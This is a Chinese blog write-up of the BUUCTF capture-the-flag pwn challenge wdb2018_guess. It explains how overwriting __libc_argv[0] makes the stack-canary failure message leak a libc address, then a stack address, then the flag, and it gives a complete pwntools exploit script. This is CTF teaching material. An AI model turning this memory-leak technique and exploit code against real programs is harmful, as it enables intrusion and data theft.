[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)

最新推荐文章于 2024-02-09 14:54:59 发布
最新推荐文章于 2024-02-09 14:54:59 发布
阅读量1.4k 收藏 11
点赞数 2
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mcmuyanga/article/details/114789897
版权

wdb2018_guess

  1. 例行检查,64位程序,开启了canary和nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况
    在这里插入图片描述
  3. 64位ida载入
    在这里插入图片描述
    存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出
    在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称),所以我们只要覆盖 __libc_argv[0] 为我们想要泄漏的地址,就能泄露对应的内容。这种利用方法详细看这个视频,空降坐标107:52
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

在这里插入图片描述

利用思路

  1. 首先计算输入与 __libc_argv[0] 的偏移,通过栈溢出覆盖 __libc_argv[0] 为 put_got 地址,这样就能泄露 libc 地址。
  2. 通过 libc 地址计算 enviorn 地址(enviorn 是环境变量表,里面包含栈地址),将 __libc_argv[0] 覆盖为 enviorn 地址即可泄露栈地址。
  3. flag 是存储在栈上,计算 enviorn 与 flag 的偏移,将 __libc_argv[0] 覆盖为 flag 的地址即可泄露 flag 。

利用过程

  1. 寻找输入点与_libc_argv[0]的偏移
    在这里插入图片描述
    他们之间的距离是0xdee8-0xddc0=0x128
    0x7fffffffdee8指向的是_libc_argv[0],_libc_argv[0]里存储的是我们的程序名,这边显示不全,显示全了是这样的
    在这里插入图片描述
  2. 接着利用栈溢出将这个地方覆盖成puts@got来泄露libc
payload='a'*0x128 + p64(puts_got)
p.sendlineafter('Please type your guessing flag',payload)
p.recvuntil('stack smashing detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
  1. 计算 enviorn 地址(enviorn 是环境变量表,里面包含栈地址),将 __libc_argv[0] 覆盖为 enviorn 地址即可泄露栈地址。如何从libc地址得到栈地址这里面就详细写了这个函数
libc_base = puts_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
print 'environ_addr=',hex(environ_addr)

payload='a'*0x128 + p64(environ_addr)
p.sendlineafter('Please type your guessing flag',payload)

p.recvuntil('stack smashing detected ***: ')
stack_addr = u64(p.recv(6).ljust(8,'\x00'))
  1. 获得栈地址后,找一下它跟flag地址的偏移,将 __libc_argv[0] 覆盖为flag地址即可
    动调的时候输入x/a _environ即可获取当前environ的地址,
    在这里插入图片描述
    search flag即可获取flag在栈上的地址,
    在这里插入图片描述
    计算一下偏移:0x7ffe4e6a7ea8-0x7ffe4e6a7d40=0x168

完整exp

#coding:utf8
from pwn import *
from LibcSearcher import *

p = process('./GUESS')
#p = remote('node3.buuoj.cn',28998)
elf = ELF('./GUESS')
puts_got = elf.got['puts']
context.log_level="debug"

#泄露puts地址
payload='a'*0x128 + p64(puts_got)
p.sendlineafter('Please type your guessing flag',payload)
p.recvuntil('stack smashing detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc=ELF('./libc-2.23(64).so')

libc_base = puts_addr - libc.sym['puts']
environ_addr = libc_base + libc.sym['__environ']
print 'environ_addr=',hex(environ_addr)

#泄露栈地址
payload='a'*0x128 + p64(environ_addr)
p.sendlineafter('Please type your guessing flag',payload)

p.recvuntil('stack smashing detected ***: ')
stack_addr = u64(p.recv(6).ljust(8,'\x00'))
print 'stack_addr=',hex(stack_addr)
gdb.attach(p)
flag_addr = stack_addr - 0x168
print 'flag_addr=',hex(flag_addr)
#泄露flag
payload='a'*0x128 + p64(flag_addr)
p.sendlineafter('Please type your guessing flag',payload)

p.interactive()

在这里插入图片描述

171119 Pwn-StackSmash
whklhhhh的博客
11-24 1035
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 519
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
buuctf pwn wp(第六波)学会绕过Canary保护
月阴荒的博客
04-22 735
canary保护,也被称为金丝雀
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 514
stack smash
BUUCYF之“wdb2018_guess
Probeginner的博客
12-18 363
stack smash的使用
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1473
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
wdb2018_guess
z1r0的博客
01-19 1060
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。 想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。 那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 420
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 387
BUUCTF 做题练习
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1100
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 410
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4222
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 426
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
wdb2018_guessstack smash
Tw0的博客
02-14 244
巩固一下stack smash技术,了解elf程序的运行环境参数。
[BUUTF]-PWN:wdb2018_guess解析(修改argv0)
2301_79326813的博客
02-09 401
查看保护查看ida这道题并不复杂,只是要注意一点细节。
PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 1302
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 487
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 559
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 320
buuctf-pwn 017-026题wp,重点关注babyheap
buuctf pwn others_shellcode
最新发布
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值